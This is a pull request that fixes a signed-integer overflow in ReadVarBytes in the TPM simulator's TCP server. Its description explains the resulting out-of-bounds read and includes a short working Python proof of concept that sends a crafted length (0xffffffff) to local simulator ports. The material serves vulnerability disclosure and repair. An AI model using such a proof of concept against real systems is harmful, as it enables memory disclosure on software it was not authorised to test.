### PR TITLE
fix integer overflow in ReadVarBytes

### DIFF
--- a/TPMCmd/Simulator/src/TcpServer.c
+++ b/TPMCmd/Simulator/src/TcpServer.c
@@ -572,9 +572,9 @@ bool ReadVarBytes(SOCKET s, char* buffer, uint32_t* BytesReceived, int MaxLen)
         return res;
     length         = ntohl(length);
     *BytesReceived = length;
-    if(length > MaxLen)
+    if(length < 0 || length > MaxLen)
     {
-        printf("Buffer too big.  Client says %d\n", length);
+        printf("Buffer too big.  Client says %u\n", length);
         return false;
     }
     if(length == 0)


### PR DESCRIPTION
length is a signed 32-bit integer and is read from input. So if we pass a value that is greater than INT32_MAX, length will become negative. Then it can pass the MaxLen check. The second ReadBytes will return true if the NumBytes is negative.

This can cause an out-of-bound read in TPM_SIGNAL_HASH_DATA because InputBuffer.BufferSize is greater than real size of InputBuffer. Poc is below.
```python
from socket import socket, AF_INET, SOCK_STREAM

tpmSock = socket(AF_INET, SOCK_STREAM)
tpmSock.connect(('127.0.0.1', 2321))

platformSock = socket(AF_INET, SOCK_STREAM)
platformSock.connect(('127.0.0.1', 2322))

platformSock.send(b'\x00\x00\x00\x01')
platResp = platformSock.recv(32)

print(b"Platform RES32:" + platResp)

tpmSock.send(b'\x00\x00\x00\x05') # TPM_SIGNAL_HASH_START
tpmSock.send(b'\x00\x00\x00\x06') # TPM_SIGNAL_HASH_DATA
tpmSock.send(b'\xff\xff\xff\xff') # -1

resp = tpmSock.recv(4096)
print(b"TPM RES4096:" + resp)
```
@CTF-YeMei